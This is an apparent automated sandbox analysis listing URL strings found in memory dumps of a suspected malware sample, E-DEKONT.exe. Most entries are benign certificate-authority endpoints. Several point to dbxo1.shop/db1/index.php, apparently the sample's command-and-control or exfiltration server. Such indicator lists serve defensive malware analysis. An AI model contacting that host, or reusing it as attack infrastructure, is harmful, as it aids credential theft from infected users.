Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: E-DEKONT.exe, 00000004.00000003.108967585571.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963689288.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966284437.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108880828920.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108965615744.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968098553.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968805939.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966999405.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108969478234.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dbxo1.shop/
Source: E-DEKONT.exe, 00000004.00000003.108967585571.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963689288.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966284437.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108880828920.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108992381204.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108992838973.0000000001A5B000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108965615744.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968098553.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968805939.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109010127986.000000001D4D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966999405.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108881646290.0000000001A52000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108969478234.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dbxo1.shop/db1/index.php
Source: E-DEKONT.exe, 00000004.00000003.108880828920.0000000001A72000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dbxo1.shop/db1/index.phpM
Source: E-DEKONT.exe, 00000004.00000003.108967585571.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963689288.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966284437.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108880828920.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108965615744.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968098553.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966999405.0000000001A72000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dbxo1.shop/db1/index.phpe
Source: E-DEKONT.exe, 00000004.00000002.109010127986.000000001D4D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://dbxo1.shop/db1/index.phpl
Source: E-DEKONT.exe, 00000004.00000003.108967585571.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963689288.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966284437.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108880828920.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108992838973.0000000001A5B000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108965615744.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968098553.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968805939.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966999405.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108969478234.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dbxo1.shop/db1/index.php~
Source: E-DEKONT.exe, 00000004.00000001.108602554916.0000000000649000.00000008.00000001.01000000.00000005.sdmp String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: E-DEKONT.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.thawte.com0
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: E-DEKONT.exe, 00000004.00000001.108602554916.0000000000649000.00000008.00000001.01000000.00000005.sdmp String found in binary or memory: http://www.gopher.ftp://ftp.
Source: E-DEKONT.exe, 00000004.00000001.108602358770.0000000000626000.00000008.00000001.01000000.00000005.sdmp String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: mozglue.dll.4.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
